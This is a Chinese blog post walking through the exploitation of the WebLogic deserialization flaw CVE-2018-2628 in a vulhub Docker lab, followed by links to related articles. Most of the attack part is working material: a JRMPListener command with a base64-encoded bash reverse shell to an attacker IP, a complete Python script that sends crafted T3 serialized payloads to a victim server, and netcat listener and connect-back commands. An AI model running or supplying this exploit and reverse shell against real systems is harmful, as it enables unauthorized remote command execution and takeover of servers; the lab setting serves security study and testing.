weblogic/CVE-2018-2628 vulhub复现

最新推荐文章于 2023-07-09 19:18:57 发布
最新推荐文章于 2023-07-09 19:18:57 发布
阅读量296 收藏 2
点赞数
分类专栏: 渗透 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51143375/article/details/128174370
版权

靶场搭建,进入目录下,终端输入docker-compose up -d

访问ip:7001,出现如下界面搭建成功

使用工具:Releases · tdy218/ysoserial-cve-2018-2628 · GitHub

 在攻击机上运行工具,命令格式为:java -cp ysoserial-0.1-cve-2018-2628-all.jar ysoserial.exploit.JRMPListener <监听端口> <jdk版本,1.7以上填写”Jdk7u21“> <要执行的命令> 

eg:java -cp ysoserial-0.1-cve-2018-2628-all.jar  ysoserial.exploit.JRMPListener 5678 Jdk7u21 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjMxLjEzMy81Njc4IDA+JjE=}|{base64,-d}|{bash,-i}"

注意:Runtime.getRuntime().exec() 中不能使用管道符等bash需要的方法,所以反弹shell时需要进行一次base64编码,链接:[~]#棱角 ::Edge.Forum*

运行成功后会显示监听端口

 之后使用python脚本

# -*- coding: utf-8 -*-
# Oracle Weblogic Server (10.3.6.0, 12.1.3.0, 12.2.1.2, 12.2.1.3) Deserialization Remote Command Execution Vulnerability (CVE-2018-2628)
#
# IMPORTANT: Is provided only for educational or information purposes.
#
# Credit: Thanks by Liao Xinxi of NSFOCUS Security Team
# Reference: http://mp.weixin.qq.com/s/nYY4zg2m2xsqT0GXa9pMGA
#
# How to exploit:
# 1. run below command on JRMPListener host
#    1) wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
#    2) java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]
#       e.g. java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'nc -nv 10.0.0.5 4040'
# 2. start a listener on attacker host
#    e.g. nc -nlvp 4040
# 3. run this script on attacker host
#    1) wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar
#    2) python exploit.py [victim ip] [victim port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] [JRMPClient]
#       e.g.
#           a) python exploit.py 10.0.0.11 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 10.0.0.5 1099 JRMPClient (Using java.rmi.registry.Registry)
#           b) python exploit.py 10.0.0.11 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 10.0.0.5 1099 JRMPClient2 (Using java.rmi.activation.Activator)

from __future__ import print_function

import binascii
import os
import socket
import sys
import time


def generate_payload(path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client):
    #generates ysoserial payload
    command = 'java -jar {} {} {}:{} > payload.out'.format(path_ysoserial, jrmp_client, jrmp_listener_ip, jrmp_listener_port)
    print("command: " + command)
    os.system(command)
    bin_file = open('payload.out','rb').read()
    return binascii.hexlify(bin_file)


def t3_handshake(sock, server_addr):
    sock.connect(server_addr)
    sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
    time.sleep(1)
    sock.recv(1024)
    print('handshake successful')


def build_t3_request_object(sock, port):
    data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
    data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(dport))
    data3 = '1a7727000d3234322e323134'
    data4 = '2e312e32353461863d1d0000000078'
    for d in [data1,data2,data3,data4]:
        sock.send(d.decode('hex'))
    time.sleep(2)
    print('send request payload successful,recv length:%d'%(len(sock.recv(2048))))


def send_payload_objdata(sock, data):
    payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
    payload+=data
    payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
    payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload)
    sock.send(payload.decode('hex'))
    time.sleep(2)
    sock.send(payload.decode('hex'))
    res = ''
    try:
        while True:
            res += sock.recv(4096)
            time.sleep(0.1)
    except Exception:
        pass
    return res


def exploit(dip, dport, path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(65)
    server_addr = (dip, dport)
    t3_handshake(sock, server_addr)
    build_t3_request_object(sock, dport)
    payload = generate_payload(path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client)
    print("payload: " + payload)
    rs=send_payload_objdata(sock, payload)
    print('response: ' + rs)
    print('exploit completed!')


if __name__=="__main__":
    #check for args, print usage if incorrect
    if len(sys.argv) != 7:
        print('\nUsage:\nexploit.py [victim ip] [victim port] [path to ysoserial] '
              '[JRMPListener ip] [JRMPListener port] [JRMPClient]\n')
        sys.exit()

    dip = sys.argv[1]
    dport = int(sys.argv[2])
    path_ysoserial = sys.argv[3]
    jrmp_listener_ip = sys.argv[4]
    jrmp_listener_port = sys.argv[5]
    jrmp_client = sys.argv[6]
    exploit(dip, dport, path_ysoserial, jrmp_listener_ip, jrmp_listener_port, jrmp_client)

命令格式:python payload.py [靶机ip] [靶机端口] [ysoserial工具] [攻击机的ip] [攻击机监听的端口] [JRMPClient]      python版本建议用2,用3会出现 'str' object has no attribute 'decode'

eg:python2 payload.py 192.168.31.134 7001 ysoserial-0.1-cve-2018-2628-all.jar 192.168.31.1 5678 JRMPClient

如无报错则攻击成功,查看之前攻击机的命令,发现收到信息

 攻击机开启端口监听,等待反弹即可

 

 

看到请叫我滚去戒烟
关注
专栏目录
[ vulhub漏洞复现篇 ] WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839)
qq_51577576的博客
03-12 1768
[ vulhub漏洞复现篇 ] WebLogic Server 远程代码执行漏洞复现 (CVE-2023-21839) WebLogic是美商Oracle的主要产品之一,系购并得来。是商业市场上主要的Java应用服务器软件之一,是世界上第一个成功商业化的J2EE应用服务器,目前已推出到14c版。而此产品也延伸出WebLogic Portal, WebLogic Integration等企业用的中间件,以及OEPE开发工具。
Vulhub漏洞系列:Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628
weixin_43072923的博客
10-16 3572
xxx:xxx00.前言01.简介02.漏洞描述03.漏洞复现 00.前言 这篇文章将对该漏洞进行简介并复现,同时简要说明Vulhub的使用方法,适合小白一起学习,大佬看看就好☺ 01.简介   Oracle 2018年4月补丁中,修复了Weblogic Server WLS Core Components中出现的一个反序列化漏洞(CVE-2018-2628),该漏洞通过t3协议触发,可导致未授权的用户在远程服务器执行任意命令。 参考链接: http://www.oracle.com/technetw
vulhub-weblogic漏洞复现系列CVE-2017-10271、CVE-2018-2628CVE-2018-2894
weixin_43071873的博客
11-20 1489
领导给了任务把vulhub里边的靶场都玩一玩。那就顺便做个系列发出来吧。 CVE-2017-10271 CVE-2018-2628 CVE-2018-2894 weak_password CVE-2014-4210(ssrf)因为vulhub的问题,redis一直启动不了,所以没复现出来。等以后更新一下vulhub之后如果可以再补充。 CVE-2017-10271 1、漏洞详情: Oracle Fusion Middleware中的Oracle WebLogic Server组件的WLS Securi
漏洞复现-反序列化-weblogic(CVE-2018-2628)
qq_38618396的博客
09-14 718
0x00 原理说明 1、了解什么是T3、RMI、JRMP? 2、了解什么是ysoserial.jar,以及如何使用? 0x01 环境搭建 搭建 环境搭建:docker + vulhub 搭建效果: 物理机:192.168.0.105 kali:192.168.233.129:7001 工具 1、nmap 2、ysoserial.jar 3、漏洞扫描脚本:https://github.com/rabbitmask/WeblogicScan 3、利用脚本:https://www.exploit-db.com/
名校400门免费人文社科公开课视频合集!
让,
03-07 3896
名校400门免费人文社科公开课视频合集! 大民说英语2月20日 北大、清华、复旦、南大、武大、南开、北师大人文社科公开课集汇总,视频资源来源自bilibili。宅在家的你,别闲着了,学起来吧! 使用方法: 将课程链接复制到浏览器地址栏打开即可。 注意: 如果有课程显示丢失或者链接实效,在bilibili网站直接搜索该课程名称也可以找到。 北京大学 ...
给大家分享一些不错的php学习视频教程
weixin_43814458的博客
03-11 1091
基础: 手把手教你写留言板系统av78744637 HTML+PHP+Mysql实现网站注册登录av78785761 php从零教学支付技术大通关Av78773453 零基础小白两小时入门PHP基础语法av81031138 两小时熟练PHP基础语法八大数据类型av81050275 PHP黄金搭档mysql数据库两小时基础入门av81142395 PHP微信扫码支付从入门到实战av83815575...
weblogic CVE-2018-2628复现
Armandhe的博客
06-15 3011
无言
Weblogic——vulhub/weblogic/CVE-2018-2894 任意文件上传复现
(∪.∪ )...zzz的博客
06-20 397
进入weblogic CVE-2018-2894 来源于https://vulhub.org/#/environments/weblogic/CVE-2018-2894/访问http://your-ip:7001/ws_utc/config.do,设置Work Home Dir为/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-tes
CVE-2023-21839 【vulhub weblogic 漏洞复现
weixin_46044002的博客
07-06 356
由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。
漏洞复现Weblogic CVE-2017-10271/CVE-2018-2628/CVE-2018-2894/CVE-2020-14882/ssrf/weak_password
weixin_45556536的博客
11-27 2049
这里写目录标题基础知识漏洞原理涉及版本漏洞特征漏洞复现CVE-2017-10271 'wls-wsat' XMLDecoder 反序列化漏洞CVE-2018-2628 Weblogic T3协议反序列化漏洞CVE-2018-2894 Weblogic任意文件上传漏洞CVE-2020-14882 weblogic 未授权命令执行漏洞漏洞修复 基础知识 Weblogic是oracle推出的application server,由于其具有支持EJB、JSP、JMS、XML等多种语言、可扩展性、快速开发等多种特性
ADI ADE7878高精度三相电表方案.pdf
09-05
ADI 公司的ADE7878是高精度三相电能测量IC,集成了串行接口和三个灵活的脉冲输出,包括有二阶Delta-Sigma ADC,数字积分器,基准电路
VulhubCVE-2018- 2628 Weblogic反序列化漏洞
weixin_61899124的博客
07-09 95
使用 k8weblogicGUI.exe getshell。使用 cve-2018-2628.py 进行连接。
php网络验证系统_b站PHP学习视频整理
weixin_39854778的博客
11-27 277
基础:手把手教你写留言板系统av78744637HTML+PHP+Mysql实现网站注册登录av78785761php从零教学支付技术大通关Av78773453零基础小白两小时入门PHP基础语法av81031138两小时熟练PHP基础语法八大数据类型av81050275PHP黄金搭档mysql数据库两小时基础入门av81142395PHP微信扫码支付从入门到实战av83815575PHP微信支付从...
SpringCloud 微服务工具集 & SpringCloud 版本: Hoxton SR6
z1987865446的博客
11-07 2138
SpringCloud 微服务工具集v1.1 SpringCloud版本: Hoxton SR6 SpringBoot版本: 2.2.x ——2.3.x 1.什么是微服务 官网: https://www.martinfowler.com/articles/microservices.html In short, the microservice architectural style is an approach to developing a single application as a
WebLogic T3 反序列化绕过漏洞(CVE-2018-2893)检测POC
IT界迷者Blog--
10-17 6930
WebLogic T3 反序列化绕过漏洞(CVE-2018-2893)检测POC #!env python # -*- coding: utf-8 -*- import socket import time import re import sys VUL=['CVE-2018-2893'] #remote ip changed to :127.0.0.1 PAYLOAD=['ACED0005...
關於小米路由器老毛子Padavan固件之使用
热门推荐
Joshua_Zheng的博客
11-04 2万+
在上篇文章中,詳細說明的如何刷老毛子Padavan固件。 這次來說說如何使用路由器自帶的軟件實現,全網訪問Google等網站。 進入路由器: 根據妳的服務商決定的。(本人的服務商支持方案一的) 方法一 如果你有服務器訂閱供應商的話,輸入供應商提供的連接 更新完在下面就會出現供應商提供的節點。剛開始刷新時是每天延遲值的,手動點擊Pin鍵 就會刷新每個節點的Pin值 之後測試連通性即可 方法二...
二. fastDFS:springboot 整合fastDFS
M义薄云天的博客
11-27 1190
一.引入官方客户端依赖 &lt;!--FastDFS--&gt; &lt;dependency&gt; &lt;groupId&gt;net.oschina.zcx7878&lt;/groupId&gt; &lt;artifactId&gt;fastdfs-client-java&lt;/artifactId&gt; &lt;version&gt;1.27.0.0&am
AVPlayer设置从哪儿开始播放
YUSIR 完美CODING世界
12-27 6035
avplayer 播放视频 首先介绍几个方法吧和属性吧。 - (id)addPeriodicTimeObserverForInterval:(CMTime)interval queue:(dispatch_queue_t)queue usingBlock:(void (^)(CMTime time))block 这个方法可以用于跟新进度条。 - (void)seekToTime
centos clamav杀毒软件安装配置及查杀,没想到linux下病毒比windows还多!
weixin_30633949的博客
07-04 349
centos clamav杀毒软件安装配置及查杀,没想到linux下病毒比windows还多! 一、手动安装 1、下载(官网) cd /soft wget http://www.clamav.net/downloads 2、解压 cd /soft tar zxvf clamav-0.99.2.tar.gz -C /usr/...
weblogic cve-2018-2628
最新发布
08-15
鉴于引用的内容,CVE-2018-2628是Oracle WebLogic Server的一个高危的Weblogic反序列化漏洞。攻击者可以利用该漏洞在未授权的情况下远程执行代码。通过使用相关的EXP工具,攻击者可以向目标WebLogic服务器发送攻击载荷,从而实现攻击。Oracle在2018年4月18日发布了关键补丁更新,其中包含了修复这个漏洞的补丁。要利用该漏洞,攻击者需要先启动JRMP Server,然后使用特定的参数来执行指定的命令。因此,需要采取相应的安全措施来保护WebLogic服务器,包括及时安装补丁和配置网络防火墙规则,以防止潜在的攻击。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [Weblogic T3协议反序列化漏洞(CVE-2018-2628)](https://blog.csdn.net/Aaron_Miller/article/details/106657746)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [weblogic-CVE-2018-2628](https://blog.csdn.net/qq_45746681/article/details/109051094)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值